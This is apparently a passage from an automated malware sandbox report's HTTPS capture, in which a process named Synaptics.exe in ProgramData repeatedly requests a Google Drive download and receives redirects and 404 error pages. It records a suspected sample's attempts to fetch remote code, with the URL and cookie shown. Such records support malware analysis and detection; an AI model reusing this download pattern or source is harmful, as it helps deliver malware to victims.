                                                                                            2025-01-02 19:30:04 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 78 68 53 58 35 59 41 5f 52 4a 71 46 37 32 4c 56 57 70 79 54 63 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                            Data Ascii: t Found)!!1</title><style nonce="xhSX5YA_RJqF72LVWpyTcQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                            2025-01-02 19:30:04 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            87192.168.2.950097172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:30:04 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:05 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:05 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-A4RUEqztqqPt27hVztUZ1Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            88192.168.2.950098216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:30:04 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:05 UTC1250INHTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC4BwuyeDri6hDV9YS8efASC0S144CcwJ314_3rhW9XjjGcUlOWiftmxM43p3h7n_FJgiadv5f8
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:05 GMT
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-Uthj4jhh8rAQIfy2DwZ4NQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:30:05 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                            2025-01-02 19:30:05 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4e 71 61 5f 4e 6f 45 72 65 68 76 58 74 44 4b 5a 73 75 44 71 74 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                            Data Ascii: 404 (Not Found)!!1</title><style nonce="Nqa_NoErehvXtDKZsuDqtA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                            2025-01-02 19:30:05 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                            Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            89192.168.2.950096172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:30:05 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:05 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:05 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-VU8fUrJKrYNV-3eWyVY-CA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            90192.168.2.950099216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:30:05 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:05 UTC1250INHTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC7jZa1BfZmaTC5U-tAJGwGlgQaWY8DergKbINa8kjWUJiXvE803Ugx1Od6ugeazz7aabIfXW5U
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:05 GMT
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-i1Bum3kP3wuV_e2eRmaSag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
                                                                                            2025-01-02 19:30:05 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                            2025-01-02 19:30:05 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 2d 50 7a 37 4e 35 33 5a 7a 6f 39 6c 56 4e 79 4f 75 57 56 31 6f 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                            Data Ascii: 404 (Not Found)!!1</title><style nonce="-Pz7N53Zzo9lVNyOuWV1ow">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                            2025-01-02 19:30:05 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                            Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            91192.168.2.950115172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:30:06 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:06 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:06 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-U8yxiBJ4KY2ONv_DeBjABA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            92192.168.2.950116172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:30:06 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:06 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:06 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce--j0ca2DqfonD6okOo7MSpA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            93192.168.2.950124172.217.18.144437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:30:07 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Host: docs.google.com
                                                                                            Cache-Control: no-cache
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:07 UTC1314INHTTP/1.1 303 See Other
                                                                                            Content-Type: application/binary
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:07 GMT
                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-_LOsx8t-hGksMlmnISrZvw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Server: ESF
                                                                                            Content-Length: 0
                                                                                            X-XSS-Protection: 0
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            X-Content-Type-Options: nosniff
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Connection: close


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            94192.168.2.950123216.58.206.654437712C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-02 19:30:07 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                            User-Agent: Synaptics.exe
                                                                                            Cache-Control: no-cache
                                                                                            Host: drive.usercontent.google.com
                                                                                            Connection: Keep-Alive
                                                                                            Cookie: NID=520=noTK5C1N_8pMK2EAbDe9sYDQK0OhW8V4dVWlitjsrxccIBuMq836MtfyVMJ2hgZwpUBNKKh-JMOmXyhEu-Ds0HadWasjMMUHXVpDaNmHmfatkHKy8YeSNNMl2ka5wONCDDT6nDqRZqvMDdpWqG3Q4NfxAOEqL9KZJtXbiCD6fcAsyFjRpzbFZ0cs
                                                                                            2025-01-02 19:30:08 UTC1243INHTTP/1.1 404 Not Found
                                                                                            X-GUploader-UploadID: AFiumC6elcOMJZf7ETZffwtj9wZrkwrp9j_eOAAu8mNnfuBkDuuqPj8axttKT8N4_P6pK7Ir
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                            Date: Thu, 02 Jan 2025 19:30:07 GMT
                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-OHCt6I374bH0sb6puiQDKQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                            Content-Length: 1652
                                                                                            Server: UploadServer
                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                            Connection: close
